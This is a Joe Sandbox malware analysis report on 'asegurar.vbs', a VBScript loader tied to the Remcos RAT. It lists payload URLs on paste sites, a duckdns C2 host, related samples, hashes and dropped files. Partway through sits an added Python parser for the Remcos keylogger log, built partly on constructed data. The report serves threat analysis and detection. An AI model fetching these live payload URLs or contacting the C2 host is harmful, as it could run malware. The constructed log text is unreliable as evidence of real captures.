• http://www.apache.org/licenses/LICENSE-2.0.html (source: powershell.exe, 00000006.00000002.1786360295.000002018022D000.00000004.00000800.00020000.00000000.sdmp); malicious: false; reputation: unknown
• https://go.micro (source: powershell.exe, 00000003.00000002.1886765737.00000260265B4000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000006.00000002.1786360295.0000020181474000.00000004.00000800.00020000.00000000.sdmp); malicious: false; URL Reputation: safe; reputation: unknown
• https://rentry.org (source: powershell.exe, 00000003.00000002.1886765737.0000026027222000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.1886765737.0000026025A8E000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000006.00000002.1786360295.0000020181474000.00000004.00000800.00020000.00000000.sdmp); malicious: false; reputation: unknown
• https://pastebin.com/raw (source: powershell.exe, 00000003.00000002.1886765737.000002602716A000.00000004.00000800.00020000.00000000.sdmp); malicious: true; reputation: unknown
• https://rentry.org/shqm6g9p/rawP (source: powershell.exe, 00000003.00000002.1886765737.0000026027222000.00000004.00000800.00020000.00000000.sdmp); malicious: false; reputation: unknown
• https://contoso.com/License (source: powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmp); malicious: false; URL Reputation: safe; reputation: unknown
• https://www.google.com; (source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp); malicious: true; reputation: unknown
• https://contoso.com/Icon (source: powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmp); malicious: false; URL Reputation: safe; reputation: unknown
• https://analytics.paste.ee (source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp); malicious: true; reputation: unknown
• https://paste.ee (source: powershell.exe, 00000003.00000002.1886765737.0000026025AD5000.00000004.00000800.00020000.00000000.sdmp); malicious: false; reputation: unknown
• https://aka.ms/pscore6 (source: powershell.exe, 00000001.00000002.1956266519.000002238A865000.00000004.00000800.00020000.00000000.sdmp); malicious: false; URL Reputation: safe; reputation: unknown
• https://github.com/Pester/Pester (source: powershell.exe, 00000006.00000002.1786360295.000002018022D000.00000004.00000800.00020000.00000000.sdmp); malicious: false; reputation: unknown
• http://geoplugin.net/json.gp (source: AddInProcess32.exe); malicious: false; URL Reputation: safe; reputation: unknown
• https://www.google.com (source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp); malicious: true; reputation: unknown
• http://rentry.org (source: powershell.exe, 00000003.00000002.1886765737.0000026027222000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000006.00000002.1786360295.0000020181950000.00000004.00000800.00020000.00000000.sdmp); malicious: false; reputation: unknown
• http://geoplugin.net/json.gp/C (source: powershell.exe, 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp; AddInProcess32.exe, 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp); malicious: false; URL Reputation: safe; reputation: unknown
• HTTPS://PASTE.EE/D/RRK2F/0 (source: powershell.exe, 00000003.00000002.1886765737.0000026025AD5000.00000004.00000800.00020000.00000000.sdmp); malicious: false; reputation: unknown
• https://contoso.com/ (source: powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmp); malicious: false; URL Reputation: safe; reputation: unknown
• https://nuget.org/nuget.exe (source: powershell.exe, 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000006.00000002.1786360295.00000201819E4000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000006.00000002.1798573819.00000201901B4000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmp); malicious: false; URL Reputation: safe; reputation: unknown
• https://rentry.org/vsm4ofxs/rawp (source: powershell.exe, 00000006.00000002.1786360295.0000020181474000.00000004.00000800.00020000.00000000.sdmp); malicious: false; reputation: unknown
• https://analytics.paste.ee; (source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp); malicious: true; reputation: unknown
• https://cdnjs.cloudflare.com (source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp); malicious: true; reputation: unknown
• https://aka.ms/pscore68 (source: powershell.exe, 00000001.00000002.1956266519.000002238A87B000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.1886765737.0000026025511000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000006.00000002.1786360295.0000020180001000.00000004.00000800.00020000.00000000.sdmp); malicious: false; URL Reputation: safe; reputation: unknown
• https://cdnjs.cloudflare.com; (source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp); malicious: true; reputation: unknown
• http://www.apache.o (source: powershell.exe, 00000006.00000002.1803498782.00000201EA48A000.00000004.00000020.00020000.00000000.sdmp); malicious: false; reputation: unknown
• http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name (source: powershell.exe, 00000001.00000002.1956266519.000002238A811000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.1886765737.0000026025511000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000006.00000002.1786360295.0000020180001000.00000004.00000800.00020000.00000000.sdmp); malicious: false; URL Reputation: safe; reputation: unknown
• http://pastebin.com (source: powershell.exe, 00000003.00000002.1886765737.0000026026B34000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.1886765737.00000260271BB000.00000004.00000800.00020000.00000000.sdmp); malicious: false; reputation: unknown
• https://pastebin.com (source: powershell.exe, 00000003.00000002.1886765737.000002602716A000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.1886765737.00000260265B4000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.1886765737.00000260258D8000.00000004.00000800.00020000.00000000.sdmp); malicious: true; reputation: unknown
• https://secure.gravatar.com (source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp); malicious: true; reputation: unknown
• https://themes.googleusercontent.com (source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp); malicious: true; reputation: unknown
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          104.20.3.235
                                                                          pastebin.comUnited States
                                                                          13335CLOUDFLARENETUStrue
                                                                          181.236.112.169
                                                                          sost.duckdns.orgColombia
                                                                          3816COLOMBIATELECOMUNICACIONESSAESPCOtrue
                                                                          164.132.58.105
                                                                          rentry.orgFrance
                                                                          16276OVHFRfalse
                                                                          188.114.97.3
                                                                          paste.eeEuropean Union
                                                                          13335CLOUDFLARENETUStrue
                                                                          IP
                                                                          127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1545852
Start date and time: 2024-10-31 07:40:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: asegurar.vbs
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winVBS@14/10@5/5
EGA Information:
• Successful, ratio: 25%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 49
• Number of non-executed functions: 190
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 3548 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5480 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 980 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:41:04 | API Interceptor | 99x Sleep call for process: powershell.exe modified
02:41:53 | API Interceptor | 1628504x Sleep call for process: AddInProcess32.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.20.3.235 | cr_asm3.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | gabe.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | cr_asm.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | cr_asm_atCAD.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | vF20HtY4a4.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | OSLdZanXNc.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | 5UIy3bo46y.dll | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | Lm9IJ4r9oO.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | BeginSync lnk.lnk | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | sostener.vbs | malicious | Njrat | pastebin.com/raw/V9y5Q5vv
164.132.58.105 | XS_Trade_AI-newest_release_.exe | malicious | LummaC |
164.132.58.105 | sims-4-updater-v1.3.4.exe | malicious | Unknown |
164.132.58.105 | RedEngine.exe | malicious | Babadeda, RedLine |
164.132.58.105 | setup.exe | malicious | Babadeda, RHADAMANTHYS, RedLine |
164.132.58.105 | 8MO5hfPa8d.exe | malicious | AsyncRAT, Clipboard Hijacker |
164.132.58.105 | SecuriteInfo.com.HEUR.Trojan.MSIL.Agent.gen.12009.5536.exe | malicious | AsyncRAT, Clipboard Hijacker |
164.132.58.105 | DLL_Injector_Resou_nls..scr.exe | malicious | AsyncRAT, Clipboard Hijacker, zgRAT |
164.132.58.105 | SynapseX_injector.exe | malicious | Python Stealer, MicroClip |
164.132.58.105 | 2PKbNS1Q41.exe | malicious | Python Stealer |
164.132.58.105 | 3yypk0NA7b.exe | malicious | Unknown |
188.114.97.3 | lf1SPbZI3V.exe | malicious | Lokibot | touxzw.ir/alpha2/five/fre.php
188.114.97.3 | Comprobante de pago.xlam.xlsx | malicious | AgentTesla | paste.ee/d/vdlzo
188.114.97.3 | Purchase_Order_pdf.exe | malicious | FormBook | www.bayarcepat19.click/g48c/
188.114.97.3 | zxalphamn.doc | malicious | Lokibot | touxzw.ir/alpha2/five/fre.php
188.114.97.3 | rPO-000172483.exe | malicious | FormBook | www.launchdreamidea.xyz/2b9b/
188.114.97.3 | rPO_28102400.exe | malicious | Lokibot | ghcopz.shop/ClarkB/PWS/fre.php
188.114.97.3 | PbfYaIvR5B.exe | malicious | DCRat, PureLog Stealer, zgRAT | windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
188.114.97.3 | SR3JZpolPo.exe | malicious | JohnWalkerTexasLoader | xilloolli.com/api.php?status=1&wallets=0&av=1
188.114.97.3 | 5Z1WFRMTOXRH6X21Z8NU8.exe | malicious | Unknown | artvisions-autoinsider.com/8bkjdSdfjCe/index.php
188.114.97.3 | PO 4800040256.exe | malicious | FormBook | www.cc101.pro/4hfb/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
rentry.org | XS_Trade_AI-newest_release_.exe | malicious | LummaC | 164.132.58.105
rentry.org | sims-4-updater-v1.3.4.exe | malicious | Unknown | 164.132.58.105
rentry.org | RedEngine.exe | malicious | Babadeda, RedLine | 164.132.58.105
rentry.org | AtlasLoader.exe | malicious | Unknown | 198.251.88.130
rentry.org | AtlasLoader.exe | malicious | Unknown | 198.251.88.130
rentry.org | LX.exe | malicious | Unknown | 198.251.88.130
rentry.org | lucim.exe | malicious | Xmrig | 198.251.88.130
rentry.org | Activator.exe | malicious | Xmrig | 198.251.88.130
rentry.org | EzLoader.exe | malicious | RHADAMANTHYS, Xmrig | 198.251.88.130
rentry.org | LolixLoader.exe | malicious | RHADAMANTHYS | 198.251.88.130
pastebin.com | SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe | malicious | Xmrig | 104.20.4.235
pastebin.com | seethebestthingstobegetmebackwithherlove.hta | malicious | Cobalt Strike | 172.67.19.24
pastebin.com | BL Packing List & Invoice.xls | malicious | Unknown | 104.20.4.235
pastebin.com | DHLShippingInvoicesAwbBL000000000102220242247.vbs | malicious | Remcos | 104.20.4.235
pastebin.com | a1OueQJq4d.exe | malicious | DCRat | 172.67.19.24
pastebin.com | 4b7b5bc7b0d1f70adf6b80390f1273723c409b837c957.dll | malicious | Unknown | 104.20.4.235
pastebin.com | loader.exe | malicious | Xmrig | 104.20.4.235
pastebin.com | SecuriteInfo.com.Win64.Evo-gen.31489.1077.exe | malicious | Xmrig | 172.67.19.24
pastebin.com | 6TCmDl2rFY.exe | malicious | DCRat | 104.20.4.235
pastebin.com | AF1cyL4cv6.vbs | malicious | AsyncRAT | 104.20.4.235
paste.ee | Comprobante de pago.xlam.xlsx | malicious | AgentTesla | 188.114.97.3
paste.ee | EwKKdCrEDu.exe | malicious | Unknown | 188.114.96.3
paste.ee | EwKKdCrEDu.exe | malicious | Unknown | 188.114.97.3
paste.ee | transferencia interbancaria_667553466579.xlam.xlsx | malicious | AgentTesla | 188.114.96.3
paste.ee | Comprobante de pago.xlam.xlsx | malicious | Unknown | 188.114.97.3
paste.ee | Orden de Compra No. 78986756565344657.xlam.xlsx | malicious | AgentTesla | 188.114.96.3
paste.ee | seethebestthingstobegetmebackwithherlove.hta | malicious | Cobalt Strike | 188.114.97.3
paste.ee | necgoodthingswithgreatthingsentirethingstobeinonline.hta | malicious | Cobalt Strike | 188.114.97.3
paste.ee | BL Packing List & Invoice.xls | malicious | Unknown | 188.114.97.3
paste.ee | DHLShippingInvoicesAwbBL000000000102220242247.vbs | malicious | Remcos | 188.114.96.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | file.exe | malicious | LummaC | 188.114.96.3
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.97.3
CLOUDFLARENETUS | A & C Metrology OC 545714677889Materiale.xls | malicious | Remcos, HTMLPhisher | 104.21.74.191
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.97.3
CLOUDFLARENETUS | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake Stealer | 188.114.96.3
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.97.3
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake Stealer | 188.114.96.3
CLOUDFLARENETUS | file.exe | malicious | Stealc, Vidar | 172.64.41.3
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig | 188.114.97.3
CLOUDFLARENETUS | file.exe | malicious | Stealc | 172.64.41.3
COLOMBIATELECOMUNICACIONESSAESPCO | jew.sh4.elf | malicious | Mirai | 190.254.50.103
COLOMBIATELECOMUNICACIONESSAESPCO | la.bot.sparc.elf | malicious | Unknown | 186.113.206.88
COLOMBIATELECOMUNICACIONESSAESPCO | la.bot.mips.elf | malicious | Unknown | 186.102.99.255
COLOMBIATELECOMUNICACIONESSAESPCO | la.bot.mipsel.elf | malicious | Unknown | 152.205.247.76
COLOMBIATELECOMUNICACIONESSAESPCO | la.bot.sparc.elf | malicious | Unknown | 190.254.50.177
COLOMBIATELECOMUNICACIONESSAESPCO | la.bot.arm5.elf | malicious | Unknown | 152.201.221.190
COLOMBIATELECOMUNICACIONESSAESPCO | nabmips.elf | malicious | Unknown | 152.203.19.145
COLOMBIATELECOMUNICACIONESSAESPCO | ppc.elf | malicious | Unknown | 152.204.126.56
COLOMBIATELECOMUNICACIONESSAESPCO | 1730033107cd1f685dd343fb5289f0989ab1767df23f3b365f9ae4183bbc963b1c7d6b27ef552.dat-decoded.exe | malicious | Remcos | 186.169.46.48
COLOMBIATELECOMUNICACIONESSAESPCO | 173003311009f4856d26633f5ec14546c9f54fd0a35c3ef95426fb756d9dfebe737a4ee690830.dat-decoded.exe | malicious | AsyncRAT, DcRat | 186.169.46.48
OVHFR | file.exe | malicious | Xmrig | 51.79.145.202
OVHFR | https://www.mediafire.com/file/oyfycncwen0a3ue/DSP_Plan_Set.zip/file | malicious | Unknown | 51.75.86.98
OVHFR | http://199.59.243.227 | malicious | HTMLPhisher | 51.75.86.98
OVHFR | https://gthr.uk/e8c3 | malicious | Unknown | 51.89.232.103
OVHFR | 20241029_163818.jpg | malicious | Unknown | 51.89.232.103
OVHFR | jew.arm.elf | malicious | Unknown | 144.217.222.207
OVHFR | jew.ppc.elf | malicious | Mirai | 37.59.96.120
OVHFR | ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe | malicious | CryptOne, Snake Keylogger, VIP Keylogger | 51.81.194.202
OVHFR | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Quasar, Stealc | 147.135.36.89
OVHFR | https://hianime.to | malicious | Unknown | 54.38.113.3
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | nOrden_de_Compra___0001245.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 104.20.3.235, 164.132.58.105, 188.114.97.3
 | file.exe | Get hash | malicious | Stealc | Browse | 104.20.3.235, 164.132.58.105, 188.114.97.3
 | file.exe | Get hash | malicious | Unknown | Browse | 104.20.3.235, 164.132.58.105, 188.114.97.3
 | file.exe | Get hash | malicious | Unknown | Browse | 104.20.3.235, 164.132.58.105, 188.114.97.3
 | Paiement.eml | Get hash | malicious | HTMLPhisher | Browse | 104.20.3.235, 164.132.58.105, 188.114.97.3
 | PO 4500580954.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 104.20.3.235, 164.132.58.105, 188.114.97.3
 | CPYEzG7VGh.exe | Get hash | malicious | DCRat | Browse | 104.20.3.235, 164.132.58.105, 188.114.97.3
 | https://jpm-ghana-2024-election-conversation-with-oct-24.open-exchange.net/join-the-call?ml_access_token=eyJjb250ZW50Ijp7ImV4cGlyYXRpb25EYXRlIjoiMjAyNC0xMC0zMVQxNToyMDo1OS4wMDZaIiwiZW1haWwiOiJyZGVpdHpAdnItY2FwaXRhbC5jb20iLCJldmVudElkIjo0MjY3Mn0sInNpZ25hdHVyZSI6Ik1FVUNJQzhaMDJJblVZd0syUk9WRkdjL1pMNHRBbWo4RmwxdW9mQjhwZzRmSjZsMkFpRUE5d25HUFFoa3ZrdkM2MlJkQ3lkM09YbnFJZ0xlQTAwMDIxNlRWbG9Hb0ZjPSJ9 | Get hash | malicious | Unknown | Browse | 104.20.3.235, 164.132.58.105, 188.114.97.3
 | SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe | Get hash | malicious | AgentTesla | Browse | 104.20.3.235, 164.132.58.105, 188.114.97.3
 | http://ffcu.online | Get hash | malicious | Unknown | Browse | 104.20.3.235, 164.132.58.105, 188.114.97.3
                                                                                              No context
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type: data
Category: dropped
Size (bytes): 144
Entropy (8bit): 3.3378527165164744
Encrypted: false
SSDEEP: 3:rhlKlM+WlUlRlM6cl5JWRal2Jl+7R0DAlBG45klovDl6v:6lw2U5YcIeeDAlOWAv
MD5: 89DC9D2B4303A079557D9F80BC2F3D8C
SHA1: 8D300391D0496527067B748335A5D4029BC5D977
SHA-256: 279D73E7BAE3B6C3B7E70694969AC96CDA99C82FCE74A79EFCAF7F6732B67EB6
SHA-512: 860BF6186D77E34B0A2D0D4398BC488AA092E92BE943479C871E6CC8BC057844E497929730E536ABAD59F5F3F2A66D472343B1C6C37CD01951503DB8B9406819
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Reputation: low
Preview: ....[.2.0.2.4./.1.0./.3.1. .0.2.:.4.1.:.2.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
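The logs.dat entry above is the Remcos offline keylogger output: UTF-16LE text (every printable byte in the preview is followed by a NUL), a bracketed timestamp line announcing the keylogger start, then the foreground window title. The Python below is an added example, not code from the Joe Sandbox report or from Remcos. It rebuilds the 144 bytes implied by the preview, decodes them, pulls out events and per-window keystrokes, and computes the 8-bit Shannon entropy so the reconstruction can be checked against the reported value. Assumptions: the four leading bytes rendered as dots are a UTF-16LE CRLF (the byte count and the entropy only match the report under that reading); the second window title and the typed text after it are constructed; and the rule "a bracketed token alone on a line is a window title" is a simplification of the log format.

```python
"""Parse a Remcos offline-keylogger logs.dat and verify the reconstruction's entropy."""
import math
import re
from collections import Counter

# Reconstruction of the 144 bytes behind the report's preview. Assumption: the four
# leading bytes shown as dots are a UTF-16LE "\r\n"; under that reading the length
# (144) and the 8-bit entropy (3.3378...) both match the values in the report.
REPORTED_LOG = (
    "\r\n[2024/10/31 02:41:21 Offline Keylogger Started]\r\n\r\n[Program Manager]\r\n"
).encode("utf-16-le")

# Constructed continuation (not from the report): a window switch and typed text,
# in the shape the header suggests.
CONSTRUCTED_TAIL = "[Untitled - Notepad]\r\nmeeting notes for friday\r\n".encode("utf-16-le")

TS_EVENT = re.compile(r"^\[(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) (.+)\]$")
TITLE = re.compile(r"^\[(.+)\]$")


def decode_log(data: bytes) -> str:
    """logs.dat is UTF-16LE; tolerate a byte-order mark if one is present."""
    if data.startswith(b"\xff\xfe"):
        data = data[2:]
    return data.decode("utf-16-le", errors="replace")


def parse_log(data: bytes):
    """Return (events, windows): timestamped bracket lines become events, other
    bracket-only lines become window titles, everything else is keystroke text
    filed under the current title. Simplification: a special-key token alone on
    a line would be misread as a title."""
    events, windows, current = [], {}, None
    for line in decode_log(data).splitlines():
        if not line.strip():
            continue
        m = TS_EVENT.match(line)
        if m:
            events.append((m.group(1), m.group(2)))
            continue
        m = TITLE.match(line)
        if m:
            current = m.group(1)
            windows.setdefault(current, [])
            continue
        windows.setdefault(current, []).append(line)
    return events, windows


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy, the measure the report lists as 'Entropy (8bit)'."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


if __name__ == "__main__":
    print(len(REPORTED_LOG), round(shannon_entropy(REPORTED_LOG), 6))
    print(parse_log(REPORTED_LOG + CONSTRUCTED_TAIL))
```

The entropy check is the cheap way to confirm a reconstruction before spending time on it: 144 bytes with half of them NUL lands at 3.34 bits, exactly what the report lists, whereas a BOM-prefixed reading would not. On a live host the same parser runs over C:\ProgramData\remcos\logs.dat, the path named in the YARA hit above.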
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 11608
Entropy (8bit): 4.890472898059848
Encrypted: false
SSDEEP: 192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
MD5: 8A4B02D8A977CB929C05D4BC2942C5A9
SHA1: F9A6426CAF2E8C64202E86B07F1A461056626BEA
SHA-256: 624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
SHA-512: 38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
Malicious: false
Reputation: moderate, very likely benign file
Preview: PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:Nlllulp77th:NllU
MD5: 7B5F360646F3167812DC4ADF7B166512
SHA1: F00A325C611E6C9CC6D2069C0FEAE54C6B7E48E5
SHA-256: 672CD1B39FD62CBC4EEAC339C7863E190A95CEF4DDCEF0F4A5BE946E098B63B0
SHA-512: 7CA2CD8F0A6E6388628AC33A539DB661FCFFE08453DFACFE353B18B548ABC08072BF2FDAE40EEEA671137FE137177ADB4E322D9C77CDE8B6AADE7600EA4C18E0
Malicious: false
Preview: @...e.................................x..............@..........

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
